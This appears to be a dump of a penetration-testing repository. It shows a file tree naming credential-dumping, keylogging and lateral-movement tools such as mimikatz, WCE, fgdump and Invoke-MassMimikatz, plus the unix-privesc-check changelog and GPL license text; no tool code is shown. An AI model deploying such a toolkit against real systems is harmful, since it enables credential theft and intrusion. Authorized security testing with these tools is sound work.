├── README.md ├── net ├── Unix │ ├── linuxprivchecker.py │ └── unix-privesc-check-1.4 │ │ ├── CHANGELOG │ │ ├── COPYING.GPL │ │ ├── COPYING.UNIX-PRIVESC-CHECK │ │ └── unix-privesc-check ├── Windows │ ├── EchoMirage-3.1.exe │ ├── HeidiSQL_9.1_Portable │ │ ├── gpl.txt │ │ ├── heidisql.exe │ │ ├── libeay32.dll │ │ ├── libintl.dll │ │ ├── libmysql.dll │ │ ├── libpq.dll │ │ ├── license.txt │ │ ├── plugins │ │ │ └── dialog.dll │ │ ├── portable_settings.txt │ │ └── ssleay32.dll │ ├── ImmunityDebugger_1_85_setup.exe │ ├── PS2EXE-v0.5.0.0 │ │ ├── MS-PL.txt │ │ ├── PSEXE.ico │ │ ├── callPS2EXE.bat │ │ ├── createDemo.bat │ │ ├── ps2exe.ps1 │ │ └── test.ps1 │ ├── PowerTools-master │ │ ├── LICENSE │ │ ├── PewPewPew │ │ │ ├── Invoke-MassCommand.ps1 │ │ │ ├── Invoke-MassMimikatz.ps1 │ │ │ ├── Invoke-MassSearch.ps1 │ │ │ ├── Invoke-MassTemplate.ps1 │ │ │ ├── Invoke-MassTokens.ps1 │ │ │ └── README.md │ │ ├── PowerPick │ │ │ ├── PowerPick.sln │ │ │ ├── PowerPick │ │ │ │ ├── PowerPick.csproj │ │ │ │ ├── PowerPick.csproj.user │ │ │ │ ├── Program.cs │ │ │ │ ├── Properties │ │ │ │ │ ├── AssemblyInfo.cs │ │ │ │ │ ├── Resources.Designer.cs │ │ │ │ │ └── Resources.resx │ │ │ │ ├── bin │ │ │ │ │ ├── Debug │ │ │ │ │ │ ├── PowerPick.vshost.exe │ │ │ │ │ │ └── PowerPick.vshost.exe.manifest │ │ │ │ │ └── Release │ │ │ │ │ │ ├── PowerPick.exe │ │ │ │ │ │ └── PowerPick.pdb │ │ │ │ └── obj │ │ │ │ │ └── x86 │ │ │ │ │ └── Release │ │ │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ │ │ ├── PowerPick.Properties.Resources.resources │ │ │ │ │ ├── PowerPick.csproj.FileListAbsolute.txt │ │ │ │ │ ├── PowerPick.csproj.GenerateResource.Cache │ │ │ │ │ ├── PowerPick.csprojResolveAssemblyReference.cache │ │ │ │ │ ├── PowerPick.exe │ │ │ │ │ ├── PowerPick.pdb │ │ │ │ │ └── TempPE │ │ │ │ │ └── Properties.Resources.Designer.cs.dll │ │ │ └── README.md │ │ ├── PowerUp │ │ │ ├── PowerUp.ps1 │ │ │ ├── PowerUp.psd1 │ │ │ ├── PowerUp.psm1 │ │ │ └── README.md │ │ ├── PowerView │ │ │ ├── LICENSE │ │ │ ├── README.md │ │ │ ├── functions │ │ │ │ ├── Get-Net.ps1 │ │ │ │ ├── Get-NetLoggedon.ps1 │ │ │ │ ├── Get-NetSessions.ps1 │ │ │ │ ├── Get-NetShare.ps1 │ │ │ │ ├── Invoke-Netview.ps1 │ │ │ │ ├── Invoke-ShareFinder.ps1 │ │ │ │ └── Invoke-UserHunter.ps1 │ │ │ ├── powerview.ps1 │ │ │ ├── powerview.psd1 │ │ │ └── powerview.psm1 │ │ └── README.md │ ├── SysinternalsSuite │ │ ├── ADExplorer.exe │ │ ├── ADInsight.chm │ │ ├── ADInsight.exe │ │ ├── AccessEnum.exe │ │ ├── AdExplorer.chm │ │ ├── Autologon.exe │ │ ├── Bginfo.exe │ │ ├── Cacheset.exe │ │ ├── Clockres.exe │ │ ├── Contig.exe │ │ ├── Coreinfo.exe │ │ ├── DISKMON.HLP │ │ ├── DMON.SYS │ │ ├── Dbgview.exe │ │ ├── Desktops.exe │ │ ├── Disk2vhd.chm │ │ ├── DiskView.exe │ │ ├── Diskmon.exe │ │ ├── Eula.txt │ │ ├── FindLinks.exe │ │ ├── Listdlls.exe │ │ ├── LoadOrd.exe │ │ ├── PORTMON.CNT │ │ ├── PORTMON.HLP │ │ ├── Procmon.exe │ │ ├── PsExec.exe │ │ ├── PsGetsid.exe │ │ ├── PsInfo.exe │ │ ├── PsLoggedon.exe │ │ ├── PsService.exe │ │ ├── Pstools.chm │ │ ├── RAMMap.exe │ │ ├── RegDelNull.exe │ │ ├── RootkitRevealer.chm │ │ ├── RootkitRevealer.exe │ │ ├── ShareEnum.exe │ │ ├── ShellRunas.exe │ │ ├── Sysmon.exe │ │ ├── TCPVIEW.HLP │ │ ├── Tcpvcon.exe │ │ ├── Tcpview.exe │ │ ├── Vmmap.chm │ │ ├── Volumeid.exe │ │ ├── WINOBJ.HLP │ │ ├── Winobj.exe │ │ ├── ZoomIt.exe │ │ ├── accesschk.exe │ │ ├── adrestore.exe │ │ ├── autoruns.chm │ │ ├── autoruns.exe │ │ ├── autorunsc.exe │ │ ├── ctrl2cap.amd.sys │ │ ├── ctrl2cap.exe │ │ ├── ctrl2cap.nt4.sys │ │ ├── ctrl2cap.nt5.sys │ │ ├── dbgview.chm │ │ ├── disk2vhd.exe │ │ ├── diskext.exe │ │ ├── du.exe │ │ ├── efsdump.exe │ │ ├── handle.exe │ │ ├── hex2dec.exe │ │ ├── junction.exe │ │ ├── ldmdump.exe │ │ ├── livekd.exe │ │ ├── logonsessions.exe │ │ ├── movefile.exe │ │ ├── ntfsinfo.exe │ │ ├── pagedfrg.exe │ │ ├── pagedfrg.hlp │ │ ├── pendmoves.exe │ │ ├── pipelist.exe │ │ ├── portmon.exe │ │ ├── procdump.exe │ │ ├── procexp.chm │ │ ├── procexp.exe │ │ ├── procmon.chm │ │ ├── psfile.exe │ │ ├── pskill.exe │ │ ├── pslist.exe │ │ ├── psloglist.exe │ │ ├── pspasswd.exe │ │ ├── psping.exe │ │ ├── psshutdown.exe │ │ ├── pssuspend.exe │ │ ├── psversion.txt │ │ ├── readme.txt │ │ ├── regjump.exe │ │ ├── ru.exe │ │ ├── sdelete.exe │ │ ├── sigcheck.exe │ │ ├── streams.exe │ │ ├── strings.exe │ │ ├── sync.exe │ │ ├── tcpview.chm │ │ ├── vmmap.exe │ │ └── whois.exe │ ├── WiresharkPortable-1.12.3.paf.exe │ ├── exe2bat.exe │ ├── fgdump.exe │ ├── klogger.exe │ ├── mimikatz_trunk │ │ ├── README.md │ │ ├── Win32 │ │ │ ├── mimidrv.sys │ │ │ ├── mimikatz.exe │ │ │ └── mimilib.dll │ │ └── x64 │ │ │ ├── mimidrv.sys │ │ │ ├── mimikatz.exe │ │ │ └── mimilib.dll │ ├── nc.exe │ ├── nc.txt │ ├── plink.exe │ ├── pscp.exe │ ├── radmin.exe │ ├── sbd.exe │ ├── vncviewer.exe │ ├── wce_v1_42beta_x32 │ │ ├── Changelog │ │ ├── LICENSE.txt │ │ ├── README │ │ ├── getlsasrvaddr.exe │ │ └── wce.exe │ ├── wce_v1_42beta_x64 │ │ ├── Changelog │ │ ├── LICENSE.txt │ │ ├── README │ │ └── wce.exe │ ├── wget.exe │ └── whoami.exe └── help.md ├── snippets ├── android │ └── help.md ├── bash │ └── README.md ├── powershell │ └── README.md └── python │ └── README.md └── web ├── burpsuite_free_v1.6.jar ├── clickjacking_bypass.html ├── clickjacking_outter_frame.html ├── csrf.html ├── help.md └── jquery-1.11.2.min.js /README.md: -------------------------------------------------------------------------------- 1 | Pentesting dump 2 | ======= 3 | 4 | Scripts, tools, and proof-of-concepts that can be handy during a penetration test. -------------------------------------------------------------------------------- /net/Unix/unix-privesc-check-1.4/CHANGELOG: -------------------------------------------------------------------------------- 1 | 2 | 2008-11-23 unix-privesc-check v1.4 3 | 4 | * Added check of file perms of shared libraries used by SUID programs. 5 | * Tidied output slightly. 6 | 7 | 2008-11-09 unix-privesc-check v1.3 8 | 9 | * Bug fix: Parts of the script only worked with /bin/bash and not /bin/sh 10 | * Bug fix: Fixed typos in reporting for privescs via cron. 11 | 12 | 2008-07-06 unix-privesc-check v1.2 13 | 14 | * Added check of library dirs (/etc/ld.so.conf) for Linux 15 | * Crude check of programs called from shell scripts 16 | * Check of libraries used by each binary program (using ldd) 17 | * Check of hard-coded paths within binaries (using strings) 18 | * More verbose WARNING messages. All the explanation for a WARNING 19 | should now be on one line so you can grep for 'WARNING' and still 20 | understand the results 21 | * Check of file perms on open file handles of running processes 22 | * Check for running SSH agent. Lists keys if possible. 23 | * Check for public and private SSH keys in home directories. 24 | * Check for running GPG agent. 25 | * Check for cron jobs in /var/spool/cron/tabs 26 | * Extra non-priv check for local postgres trusts 27 | * Bug fix: lanscan now used on HPUX to get interface names 28 | * Check if system is an NFS client (HPUX only) 29 | * Check if swap space is readable / writable 30 | 31 | 2008-04-17 unix-privesc-check v1.1 32 | 33 | * Added check for accounts with no password in /etc/passwd 34 | * Record some basic info about the host (hostname, uname -a, interface IPs) 35 | 36 | 2008-02-01 unix-privesc-check v1.0 37 | 38 | * Initial public release 39 | -------------------------------------------------------------------------------- /net/Unix/unix-privesc-check-1.4/COPYING.GPL: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc., 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The licenses for most software are designed to take away your 12 | freedom to share and change it. By contrast, the GNU General Public 13 | License is intended to guarantee your freedom to share and change free 14 | software--to make sure the software is free for all its users. This 15 | General Public License applies to most of the Free Software 16 | Foundation's software and to any other program whose authors commit to 17 | using it. (Some other Free Software Foundation software is covered by 18 | the GNU Lesser General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not 22 | price. Our General Public Licenses are designed to make sure that you 23 | have the freedom to distribute copies of free software (and charge for 24 | this service if you wish), that you receive source code or can get it 25 | if you want it, that you can change the software or use pieces of it 26 | in new free programs; and that you know you can do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid 29 | anyone to deny you these rights or to ask you to surrender the rights. 30 | These restrictions translate to certain responsibilities for you if you 31 | distribute copies of the software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether 34 | gratis or for a fee, you must give the recipients all the rights that 35 | you have. You must make sure that they, too, receive or can get the 36 | source code. And you must show them these terms so they know their 37 | rights. 38 | 39 | We protect your rights with two steps: (1) copyright the software, and 40 | (2) offer you this license which gives you legal permission to copy, 41 | distribute and/or modify the software. 42 | 43 | Also, for each author's protection and ours, we want to make certain 44 | that everyone understands that there is no warranty for this free 45 | software. If the software is modified by someone else and passed on, we 46 | want its recipients to know that what they have is not the original, so 47 | that any problems introduced by others will not reflect on the original 48 | authors' reputations. 49 | 50 | Finally, any free program is threatened constantly by software 51 | patents. We wish to avoid the danger that redistributors of a free 52 | program will individually obtain patent licenses, in effect making the 53 | program proprietary. To prevent this, we have made it clear that any 54 | patent must be licensed for everyone's free use or not licensed at all. 55 | 56 | The precise terms and conditions for copying, distribution and 57 | modification follow. 58 | 59 | GNU GENERAL PUBLIC LICENSE 60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 61 | 62 | 0. This License applies to any program or other work which contains 63 | a notice placed by the copyright holder saying it may be distributed 64 | under the terms of this General Public License. The "Program", below, 65 | refers to any such program or work, and a "work based on the Program" 66 | means either the Program or any derivative work under copyright law: 67 | that is to say, a work containing the Program or a portion of it, 68 | either verbatim or with modifications and/or translated into another 69 | language. (Hereinafter, translation is included without limitation in 70 | the term "modification".) Each licensee is addressed as "you". 71 | 72 | Activities other than copying, distribution and modification are not 73 | covered by this License; they are outside its scope. The act of 74 | running the Program is not restricted, and the output from the Program 75 | is covered only if its contents constitute a work based on the 76 | Program (independent of having been made by running the Program). 77 | Whether that is true depends on what the Program does. 78 | 79 | 1. You may copy and distribute verbatim copies of the Program's 80 | source code as you receive it, in any medium, provided that you 81 | conspicuously and appropriately publish on each copy an appropriate 82 | copyright notice and disclaimer of warranty; keep intact all the 83 | notices that refer to this License and to the absence of any warranty; 84 | and give any other recipients of the Program a copy of this License 85 | along with the Program. 86 | 87 | You may charge a fee for the physical act of transferring a copy, and 88 | you may at your option offer warranty protection in exchange for a fee. 89 | 90 | 2. You may modify your copy or copies of the Program or any portion 91 | of it, thus forming a work based on the Program, and copy and 92 | distribute such modifications or work under the terms of Section 1 93 | above, provided that you also meet all of these conditions: 94 | 95 | a) You must cause the modified files to carry prominent notices 96 | stating that you changed the files and the date of any change. 97 | 98 | b) You must cause any work that you distribute or publish, that in 99 | whole or in part contains or is derived from the Program or any 100 | part thereof, to be licensed as a whole at no charge to all third 101 | parties under the terms of this License. 102 | 103 | c) If the modified program normally reads commands interactively 104 | when run, you must cause it, when started running for such 105 | interactive use in the most ordinary way, to print or display an 106 | announcement including an appropriate copyright notice and a 107 | notice that there is no warranty (or else, saying that you provide 108 | a warranty) and that users may redistribute the program under 109 | these conditions, and telling the user how to view a copy of this 110 | License. (Exception: if the Program itself is interactive but 111 | does not normally print such an announcement, your work based on 112 | the Program is not required to print an announcement.) 113 | 114 | These requirements apply to the modified work as a whole. If 115 | identifiable sections of that work are not derived from the Program, 116 | and can be reasonably considered independent and separate works in 117 | themselves, then this License, and its terms, do not apply to those 118 | sections when you distribute them as separate works. But when you 119 | distribute the same sections as part of a whole which is a work based 120 | on the Program, the distribution of the whole must be on the terms of 121 | this License, whose permissions for other licensees extend to the 122 | entire whole, and thus to each and every part regardless of who wrote it. 123 | 124 | Thus, it is not the intent of this section to claim rights or contest 125 | your rights to work written entirely by you; rather, the intent is to 126 | exercise the right to control the distribution of derivative or 127 | collective works based on the Program. 128 | 129 | In addition, mere aggregation of another work not based on the Program 130 | with the Program (or with a work based on the Program) on a volume of 131 | a storage or distribution medium does not bring the other work under 132 | the scope of this License. 133 | 134 | 3. You may copy and distribute the Program (or a work based on it, 135 | under Section 2) in object code or executable form under the terms of 136 | Sections 1 and 2 above provided that you also do one of the following: 137 | 138 | a) Accompany it with the complete corresponding machine-readable 139 | source code, which must be distributed under the terms of Sections 140 | 1 and 2 above on a medium customarily used for software interchange; or, 141 | 142 | b) Accompany it with a written offer, valid for at least three 143 | years, to give any third party, for a charge no more than your 144 | cost of physically performing source distribution, a complete 145 | machine-readable copy of the corresponding source code, to be 146 | distributed under the terms of Sections 1 and 2 above on a medium 147 | customarily used for software interchange; or, 148 | 149 | c) Accompany it with the information you received as to the offer 150 | to distribute corresponding source code. (This alternative is 151 | allowed only for noncommercial distribution and only if you 152 | received the program in object code or executable form with such 153 | an offer, in accord with Subsection b above.) 154 | 155 | The source code for a work means the preferred form of the work for 156 | making modifications to it. For an executable work, complete source 157 | code means all the source code for all modules it contains, plus any 158 | associated interface definition files, plus the scripts used to 159 | control compilation and installation of the executable. However, as a 160 | special exception, the source code distributed need not include 161 | anything that is normally distributed (in either source or binary 162 | form) with the major components (compiler, kernel, and so on) of the 163 | operating system on which the executable runs, unless that component 164 | itself accompanies the executable. 165 | 166 | If distribution of executable or object code is made by offering 167 | access to copy from a designated place, then offering equivalent 168 | access to copy the source code from the same place counts as 169 | distribution of the source code, even though third parties are not 170 | compelled to copy the source along with the object code. 171 | 172 | 4. You may not copy, modify, sublicense, or distribute the Program 173 | except as expressly provided under this License. Any attempt 174 | otherwise to copy, modify, sublicense or distribute the Program is 175 | void, and will automatically terminate your rights under this License. 176 | However, parties who have received copies, or rights, from you under 177 | this License will not have their licenses terminated so long as such 178 | parties remain in full compliance. 179 | 180 | 5. You are not required to accept this License, since you have not 181 | signed it. However, nothing else grants you permission to modify or 182 | distribute the Program or its derivative works. These actions are 183 | prohibited by law if you do not accept this License. Therefore, by 184 | modifying or distributing the Program (or any work based on the 185 | Program), you indicate your acceptance of this License to do so, and 186 | all its terms and conditions for copying, distributing or modifying 187 | the Program or works based on it. 188 | 189 | 6. Each time you redistribute the Program (or any work based on the 190 | Program), the recipient automatically receives a license from the 191 | original licensor to copy, distribute or modify the Program subject to 192 | these terms and conditions. You may not impose any further 193 | restrictions on the recipients' exercise of the rights granted herein. 194 | You are not responsible for enforcing compliance by third parties to 195 | this License. 196 | 197 | 7. If, as a consequence of a court judgment or allegation of patent 198 | infringement or for any other reason (not limited to patent issues), 199 | conditions are imposed on you (whether by court order, agreement or 200 | otherwise) that contradict the conditions of this License, they do not 201 | excuse you from the conditions of this License. If you cannot 202 | distribute so as to satisfy simultaneously your obligations under this 203 | License and any other pertinent obligations, then as a consequence you 204 | may not distribute the Program at all. For example, if a patent 205 | license would not permit royalty-free redistribution of the Program by 206 | all those who receive copies directly or indirectly through you, then 207 | the only way you could satisfy both it and this License would be to 208 | refrain entirely from distribution of the Program. 209 | 210 | If any portion of this section is held invalid or unenforceable under 211 | any particular circumstance, the balance of the section is intended to 212 | apply and the section as a whole is intended to apply in other 213 | circumstances. 214 | 215 | It is not the purpose of this section to induce you to infringe any 216 | patents or other property right claims or to contest validity of any 217 | such claims; this section has the sole purpose of protecting the 218 | integrity of the free software distribution system, which is 219 | implemented by public license practices. Many people have made 220 | generous contributions to the wide range of software distributed 221 | through that system in reliance on consistent application of that 222 | system; it is up to the author/donor to decide if he or she is willing 223 | to distribute software through any other system and a licensee cannot 224 | impose that choice. 225 | 226 | This section is intended to make thoroughly clear what is believed to 227 | be a consequence of the rest of this License. 228 | 229 | 8. If the distribution and/or use of the Program is restricted in 230 | certain countries either by patents or by copyrighted interfaces, the 231 | original copyright holder who places the Program under this License 232 | may add an explicit geographical distribution limitation excluding 233 | those countries, so that distribution is permitted only in or among 234 | countries not thus excluded. In such case, this License incorporates 235 | the limitation as if written in the body of this License. 236 | 237 | 9. The Free Software Foundation may publish revised and/or new versions 238 | of the General Public License from time to time. Such new versions will 239 | be similar in spirit to the present version, but may differ in detail to 240 | address new problems or concerns. 241 | 242 | Each version is given a distinguishing version number. If the Program 243 | specifies a version number of this License which applies to it and "any 244 | later version", you have the option of following the terms and conditions 245 | either of that version or of any later version published by the Free 246 | Software Foundation. If the Program does not specify a version number of 247 | this License, you may choose any version ever published by the Free Software 248 | Foundation. 249 | 250 | 10. If you wish to incorporate parts of the Program into other free 251 | programs whose distribution conditions are different, write to the author 252 | to ask for permission. For software which is copyrighted by the Free 253 | Software Foundation, write to the Free Software Foundation; we sometimes 254 | make exceptions for this. Our decision will be guided by the two goals 255 | of preserving the free status of all derivatives of our free software and 256 | of promoting the sharing and reuse of software generally. 257 | 258 | NO WARRANTY 259 | 260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 | REPAIR OR CORRECTION. 269 | 270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 | POSSIBILITY OF SUCH DAMAGES. 279 | 280 | END OF TERMS AND CONDITIONS 281 | 282 | How to Apply These Terms to Your New Programs 283 | 284 | If you develop a new program, and you want it to be of the greatest 285 | possible use to the public, the best way to achieve this is to make it 286 | free software which everyone can redistribute and change under these terms. 287 | 288 | To do so, attach the following notices to the program. It is safest 289 | to attach them to the start of each source file to most effectively 290 | convey the exclusion of warranty; and each file should have at least 291 | the "copyright" line and a pointer to where the full notice is found. 292 | 293 | 294 | Copyright (C) 295 | 296 | This program is free software; you can redistribute it and/or modify 297 | it under the terms of the GNU General Public License as published by 298 | the Free Software Foundation; either version 2 of the License, or 299 | (at your option) any later version. 300 | 301 | This program is distributed in the hope that it will be useful, 302 | but WITHOUT ANY WARRANTY; without even the implied warranty of 303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 | GNU General Public License for more details. 305 | 306 | You should have received a copy of the GNU General Public License along 307 | with this program; if not, write to the Free Software Foundation, Inc., 308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 309 | 310 | Also add information on how to contact you by electronic and paper mail. 311 | 312 | If the program is interactive, make it output a short notice like this 313 | when it starts in an interactive mode: 314 | 315 | Gnomovision version 69, Copyright (C) year name of author 316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 317 | This is free software, and you are welcome to redistribute it 318 | under certain conditions; type `show c' for details. 319 | 320 | The hypothetical commands `show w' and `show c' should show the appropriate 321 | parts of the General Public License. Of course, the commands you use may 322 | be called something other than `show w' and `show c'; they could even be 323 | mouse-clicks or menu items--whatever suits your program. 324 | 325 | You should also get your employer (if you work as a programmer) or your 326 | school, if any, to sign a "copyright disclaimer" for the program, if 327 | necessary. Here is a sample; alter the names: 328 | 329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 330 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 331 | 332 | , 1 April 1989 333 | Ty Coon, President of Vice 334 | 335 | This General Public License does not permit incorporating your program into 336 | proprietary programs. If your program is a subroutine library, you may 337 | consider it more useful to permit linking proprietary applications with the 338 | library. If this is what you want to do, use the GNU Lesser General 339 | Public License instead of this License. 340 | -------------------------------------------------------------------------------- /net/Unix/unix-privesc-check-1.4/COPYING.UNIX-PRIVESC-CHECK: -------------------------------------------------------------------------------- 1 | This tool may be used for legal purposes only. Users take full responsibility 2 | for any actions performed using this tool. The author accepts no liability for 3 | damage caused by this tool. If these terms are not acceptable to you, then 4 | you are not permitted to use this tool. 5 | 6 | In all other respects the GPL version 2 applies. 7 | -------------------------------------------------------------------------------- /net/Windows/EchoMirage-3.1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/EchoMirage-3.1.exe -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/gpl.txt: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc. 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The licenses for most software are designed to take away your 12 | freedom to share and change it. By contrast, the GNU General Public 13 | License is intended to guarantee your freedom to share and change free 14 | software--to make sure the software is free for all its users. This 15 | General Public License applies to most of the Free Software 16 | Foundation's software and to any other program whose authors commit to 17 | using it. (Some other Free Software Foundation software is covered by 18 | the GNU Lesser General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not 22 | price. Our General Public Licenses are designed to make sure that you 23 | have the freedom to distribute copies of free software (and charge for 24 | this service if you wish), that you receive source code or can get it 25 | if you want it, that you can change the software or use pieces of it 26 | in new free programs; and that you know you can do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid 29 | anyone to deny you these rights or to ask you to surrender the rights. 30 | These restrictions translate to certain responsibilities for you if you 31 | distribute copies of the software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether 34 | gratis or for a fee, you must give the recipients all the rights that 35 | you have. You must make sure that they, too, receive or can get the 36 | source code. And you must show them these terms so they know their 37 | rights. 38 | 39 | We protect your rights with two steps: (1) copyright the software, and 40 | (2) offer you this license which gives you legal permission to copy, 41 | distribute and/or modify the software. 42 | 43 | Also, for each author's protection and ours, we want to make certain 44 | that everyone understands that there is no warranty for this free 45 | software. If the software is modified by someone else and passed on, we 46 | want its recipients to know that what they have is not the original, so 47 | that any problems introduced by others will not reflect on the original 48 | authors' reputations. 49 | 50 | Finally, any free program is threatened constantly by software 51 | patents. We wish to avoid the danger that redistributors of a free 52 | program will individually obtain patent licenses, in effect making the 53 | program proprietary. To prevent this, we have made it clear that any 54 | patent must be licensed for everyone's free use or not licensed at all. 55 | 56 | The precise terms and conditions for copying, distribution and 57 | modification follow. 58 | 59 | GNU GENERAL PUBLIC LICENSE 60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 61 | 62 | 0. This License applies to any program or other work which contains 63 | a notice placed by the copyright holder saying it may be distributed 64 | under the terms of this General Public License. The "Program", below, 65 | refers to any such program or work, and a "work based on the Program" 66 | means either the Program or any derivative work under copyright law: 67 | that is to say, a work containing the Program or a portion of it, 68 | either verbatim or with modifications and/or translated into another 69 | language. (Hereinafter, translation is included without limitation in 70 | the term "modification".) Each licensee is addressed as "you". 71 | 72 | Activities other than copying, distribution and modification are not 73 | covered by this License; they are outside its scope. The act of 74 | running the Program is not restricted, and the output from the Program 75 | is covered only if its contents constitute a work based on the 76 | Program (independent of having been made by running the Program). 77 | Whether that is true depends on what the Program does. 78 | 79 | 1. You may copy and distribute verbatim copies of the Program's 80 | source code as you receive it, in any medium, provided that you 81 | conspicuously and appropriately publish on each copy an appropriate 82 | copyright notice and disclaimer of warranty; keep intact all the 83 | notices that refer to this License and to the absence of any warranty; 84 | and give any other recipients of the Program a copy of this License 85 | along with the Program. 86 | 87 | You may charge a fee for the physical act of transferring a copy, and 88 | you may at your option offer warranty protection in exchange for a fee. 89 | 90 | 2. You may modify your copy or copies of the Program or any portion 91 | of it, thus forming a work based on the Program, and copy and 92 | distribute such modifications or work under the terms of Section 1 93 | above, provided that you also meet all of these conditions: 94 | 95 | a) You must cause the modified files to carry prominent notices 96 | stating that you changed the files and the date of any change. 97 | 98 | b) You must cause any work that you distribute or publish, that in 99 | whole or in part contains or is derived from the Program or any 100 | part thereof, to be licensed as a whole at no charge to all third 101 | parties under the terms of this License. 102 | 103 | c) If the modified program normally reads commands interactively 104 | when run, you must cause it, when started running for such 105 | interactive use in the most ordinary way, to print or display an 106 | announcement including an appropriate copyright notice and a 107 | notice that there is no warranty (or else, saying that you provide 108 | a warranty) and that users may redistribute the program under 109 | these conditions, and telling the user how to view a copy of this 110 | License. (Exception: if the Program itself is interactive but 111 | does not normally print such an announcement, your work based on 112 | the Program is not required to print an announcement.) 113 | 114 | These requirements apply to the modified work as a whole. If 115 | identifiable sections of that work are not derived from the Program, 116 | and can be reasonably considered independent and separate works in 117 | themselves, then this License, and its terms, do not apply to those 118 | sections when you distribute them as separate works. But when you 119 | distribute the same sections as part of a whole which is a work based 120 | on the Program, the distribution of the whole must be on the terms of 121 | this License, whose permissions for other licensees extend to the 122 | entire whole, and thus to each and every part regardless of who wrote it. 123 | 124 | Thus, it is not the intent of this section to claim rights or contest 125 | your rights to work written entirely by you; rather, the intent is to 126 | exercise the right to control the distribution of derivative or 127 | collective works based on the Program. 128 | 129 | In addition, mere aggregation of another work not based on the Program 130 | with the Program (or with a work based on the Program) on a volume of 131 | a storage or distribution medium does not bring the other work under 132 | the scope of this License. 133 | 134 | 3. You may copy and distribute the Program (or a work based on it, 135 | under Section 2) in object code or executable form under the terms of 136 | Sections 1 and 2 above provided that you also do one of the following: 137 | 138 | a) Accompany it with the complete corresponding machine-readable 139 | source code, which must be distributed under the terms of Sections 140 | 1 and 2 above on a medium customarily used for software interchange; or, 141 | 142 | b) Accompany it with a written offer, valid for at least three 143 | years, to give any third party, for a charge no more than your 144 | cost of physically performing source distribution, a complete 145 | machine-readable copy of the corresponding source code, to be 146 | distributed under the terms of Sections 1 and 2 above on a medium 147 | customarily used for software interchange; or, 148 | 149 | c) Accompany it with the information you received as to the offer 150 | to distribute corresponding source code. (This alternative is 151 | allowed only for noncommercial distribution and only if you 152 | received the program in object code or executable form with such 153 | an offer, in accord with Subsection b above.) 154 | 155 | The source code for a work means the preferred form of the work for 156 | making modifications to it. For an executable work, complete source 157 | code means all the source code for all modules it contains, plus any 158 | associated interface definition files, plus the scripts used to 159 | control compilation and installation of the executable. However, as a 160 | special exception, the source code distributed need not include 161 | anything that is normally distributed (in either source or binary 162 | form) with the major components (compiler, kernel, and so on) of the 163 | operating system on which the executable runs, unless that component 164 | itself accompanies the executable. 165 | 166 | If distribution of executable or object code is made by offering 167 | access to copy from a designated place, then offering equivalent 168 | access to copy the source code from the same place counts as 169 | distribution of the source code, even though third parties are not 170 | compelled to copy the source along with the object code. 171 | 172 | 4. You may not copy, modify, sublicense, or distribute the Program 173 | except as expressly provided under this License. Any attempt 174 | otherwise to copy, modify, sublicense or distribute the Program is 175 | void, and will automatically terminate your rights under this License. 176 | However, parties who have received copies, or rights, from you under 177 | this License will not have their licenses terminated so long as such 178 | parties remain in full compliance. 179 | 180 | 5. You are not required to accept this License, since you have not 181 | signed it. However, nothing else grants you permission to modify or 182 | distribute the Program or its derivative works. These actions are 183 | 